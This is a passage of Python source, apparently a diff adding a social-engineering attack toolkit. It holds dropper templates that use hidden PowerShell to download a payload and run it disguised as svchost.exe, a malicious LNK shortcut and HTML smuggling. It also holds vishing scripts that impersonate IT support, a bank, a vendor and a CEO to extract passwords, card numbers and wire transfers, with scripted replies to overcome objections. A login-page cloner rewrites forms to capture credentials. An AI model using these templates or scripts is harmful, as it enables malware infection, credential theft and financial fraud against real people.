-ep bypass -c "' + '$c=New-Object Net.WebClient;' + '$c.DownloadFile(\'{payload_url}\',\'%TEMP%\\svchost.exe\');' + 'Start-Process \'%TEMP%\\svchost.exe\'"\n' + 'REM Open decoy\n' + 'start "" "{decoy_url}"\n' + 'exit\n' + ), + }, + 'lnk_dropper': { + 'name': 'LNK Shortcut Dropper', + 'description': 'Windows shortcut file command — executes hidden PowerShell on click', + 'template': ( + 'REM Create this LNK with target:\n' + 'REM %comspec% /c powershell -w hidden -ep bypass -c "' + 'IEX((New-Object Net.WebClient).DownloadString(\'{payload_url}\'))"\n' + 'REM Icon: shell32.dll,3 (folder icon) or shell32.dll,1 (document)\n' + 'REM Name: Quarterly_Report or Shared_Photos\n' + ), + }, + 'html_smuggling': { + 'name': 'HTML Smuggling', + 'description': 'HTML file that assembles and drops a payload via JavaScript', + 'template': ( + '\n' + '{title}\n' + '\n' + '

Loading document...

\n' + '

If the download does not start automatically, click here.

\n' + '\n' + '\n' + ), + }, +} + + +# ── Vishing Scripts ────────────────────────────────────────────────────────── + +VISHING_SCRIPTS = { + 'it_helpdesk': { + 'name': 'IT Help Desk Call', + 'description': 'Impersonate IT support to extract credentials or install remote access', + 'opening': ( + 'Hello, this is {caller_name} from the IT Help Desk. ' + 'We are seeing some unusual activity on your network account and I need ' + 'to verify a few things with you to make sure your account is secure.' + ), + 'key_questions': [ + 'Can you confirm your full name and employee ID for verification?', + 'What department are you in?', + 'Are you currently logged in to your workstation?', + 'Have you noticed any unusual behavior — slow performance, unexpected pop-ups?', + 'I am going to need to push a security update to your machine. Can you open a browser and go to {url}?', + ], + 'credential_extraction': ( + 'I need to verify your account is not compromised. Can you enter your ' + 'username and current password on the verification page I just sent you? ' + 'This is a secure IT portal — your credentials are encrypted.' + ), + 'objection_handling': { + 'why_calling': 'Our monitoring system flagged your account. We are reaching out to all affected users proactively.', + 'how_verify_you': 'You can call back on the main IT line at {phone} and ask for {caller_name} in Security Operations.', + 'not_comfortable': 'I completely understand. Let me have my supervisor {supervisor_name} call you back within 10 minutes.', + 'will_call_back': 'Of course. Please call the Help Desk at {phone} before 5 PM today, as we need to resolve this within our response window.', + }, + 'closing': 'Thank you for your cooperation. I have updated your account status. 
If you notice anything unusual, call us at {phone}.', + }, + 'bank_fraud': { + 'name': 'Bank Fraud Alert', + 'description': 'Impersonate bank fraud department to extract account details', + 'opening': ( + 'Hello, this is {caller_name} from the {bank_name} Fraud Prevention Department. ' + 'We are calling because we have detected a suspicious transaction on your account ' + 'and we need to verify some information before we can proceed with blocking it.' + ), + 'key_questions': [ + 'For verification, can you confirm the last four digits of your account number?', + 'What is the billing address associated with this account?', + 'Did you authorize a transaction of ${amount} to {merchant} on {date}?', + 'I need to verify your identity. Can you provide your date of birth?', + ], + 'credential_extraction': ( + 'To block the fraudulent transaction and secure your account, I will need to ' + 'verify your full card number and the security code on the back. This is to ' + 'confirm you are the authorized account holder.' + ), + 'objection_handling': { + 'why_calling': 'Our automated fraud detection system flagged a ${amount} charge that does not match your normal spending pattern.', + 'how_verify_you': 'You can call the number on the back of your card and ask to be transferred to the fraud department.', + 'not_comfortable': 'I understand your concern. For your protection, I can place a temporary hold on the card while you verify through the bank app.', + 'will_call_back': 'Absolutely. Please call the number on the back of your card within the hour. Reference case number {case_num}.', + }, + 'closing': 'I have placed a temporary hold on the suspicious transaction. You will receive a confirmation text shortly. Is there anything else I can help with?', + }, + 'vendor_support': { + 'name': 'Vendor Technical Support', + 'description': 'Impersonate software vendor support for remote access installation', + 'opening': ( + 'Hi, this is {caller_name} with {vendor_name} Support. 
We noticed that your ' + 'organization\'s {product_name} license is showing some configuration errors ' + 'that could lead to data loss. I\'d like to help resolve this quickly.' + ), + 'key_questions': [ + 'Who is the primary administrator for your {product_name} installation?', + 'What version are you currently running?', + 'Are you able to access the admin console right now?', + 'I may need to connect remotely to diagnose the issue. Do you have remote access software available?', + ], + 'credential_extraction': ( + 'To apply the fix, I will need your admin credentials for {product_name}. ' + 'Alternatively, you can grant me temporary admin access through the portal at {url}.' + ), + 'objection_handling': { + 'why_calling': 'Our monitoring detected your instance is running a configuration that was flagged in security bulletin {bulletin_id}.', + 'how_verify_you': 'You can verify this call by contacting {vendor_name} support at {phone} and referencing ticket {ticket_id}.', + 'not_comfortable': 'No problem. I can send you detailed instructions via email and you can perform the fix yourself.', + 'will_call_back': 'Sure. The support ticket is {ticket_id}. Please call us back within 24 hours before the issue escalates.', + }, + 'closing': 'The configuration has been updated. You should see the fix reflected within the next hour. If any issues arise, reference ticket {ticket_id}.', + }, + 'ceo_urgent': { + 'name': 'CEO Urgent Request', + 'description': 'Impersonate executive for urgent financial action', + 'opening': ( + 'Hi {target_name}, this is {exec_name}. I know this is short notice, ' + 'but I need your help with something urgent and confidential. I am tied up ' + 'in a board meeting and cannot handle this myself right now.' 
+ ), + 'key_questions': [ + 'Are you at your desk right now?', + 'Can you access the accounts payable system?', + 'Have you processed international wire transfers before?', + ], + 'credential_extraction': ( + 'I need you to process a wire transfer for a time-sensitive acquisition. ' + 'The details are in a secure document I will email you. Please use your ' + 'credentials to authorize the transfer immediately.' + ), + 'objection_handling': { + 'why_calling': 'This is related to a confidential acquisition. I cannot discuss details over email for legal reasons.', + 'need_approval': 'I\'ve already approved this with the CFO. You can verify with {cfo_name} after the transfer — but we need to move now.', + 'not_comfortable': 'I understand, but this cannot wait. I\'ll take full responsibility. Just process it and I\'ll sign the authorization form when I\'m out of this meeting.', + 'unusual_request': 'I know this is irregular. That\'s why I\'m calling you personally instead of sending an email.', + }, + 'closing': 'Thank you for handling this so quickly. I really appreciate it. 
I will follow up with the paperwork once I am out of this meeting.', + }, +} + + +# ── Social Engineering Toolkit Class ───────────────────────────────────────── + +class SocialEngToolkit: + """Social engineering toolkit — page cloning, pretexts, QR codes, USB payloads.""" + + def __init__(self): + self._data_dir = Path(get_data_dir()) / 'social_eng' + self._pages_dir = self._data_dir / 'pages' + self._captures_path = self._data_dir / 'captures.json' + self._campaigns_path = self._data_dir / 'campaigns.json' + self._qr_dir = self._data_dir / 'qr' + + # Ensure directories + self._pages_dir.mkdir(parents=True, exist_ok=True) + self._qr_dir.mkdir(parents=True, exist_ok=True) + + # Load persistent state + self._captures = self._load_json(self._captures_path, []) + self._campaigns = self._load_json(self._campaigns_path, []) + + # ── Persistence helpers ────────────────────────────────────────────────── + + @staticmethod + def _load_json(path: Path, default=None): + try: + if path.exists(): + with open(path, 'r', encoding='utf-8') as f: + return json.load(f) + except (json.JSONDecodeError, OSError): + pass + return default if default is not None else {} + + def _save_captures(self): + with open(self._captures_path, 'w', encoding='utf-8') as f: + json.dump(self._captures, f, indent=2, default=str) + + def _save_campaigns(self): + with open(self._campaigns_path, 'w', encoding='utf-8') as f: + json.dump(self._campaigns, f, indent=2, default=str) + + # ── Page Cloning ───────────────────────────────────────────────────────── + + def clone_page(self, url: str, output_dir: str = None) -> Dict[str, Any]: + """Fetch a login page, rewrite form actions to AUTARCH capture endpoint. + + Returns dict with ok, page_id, path, and file details. 
+ """ + if not REQUESTS_AVAILABLE: + return {'ok': False, 'error': 'requests library not installed'} + + try: + parsed = urlparse(url) + if not parsed.scheme: + url = 'https://' + url + parsed = urlparse(url) + + resp = requests.get(url, timeout=15, headers={ + 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) ' + 'AppleWebKit/537.36 (KHTML, like Gecko) ' + 'Chrome/120.0.0.0 Safari/537.36' + }, verify=False) + resp.raise_for_status() + + page_id = hashlib.md5(url.encode()).hexdigest()[:12] + page_dir = Path(output_dir) if output_dir else self._pages_dir / page_id + page_dir.mkdir(parents=True, exist_ok=True) + + html = resp.text + base_url = f"{parsed.scheme}://{parsed.netloc}" + + # Rewrite relative URLs for resources + html = re.sub( + r'(src|href)=(["\'])(?!/|https?://)', + lambda m: f'{m.group(1)}={m.group(2)}{base_url}/', + html + ) + + # Rewrite form actions to point to AUTARCH capture endpoint + html = re.sub( + r']*?)action=(["\'])[^"\']*\2', + f'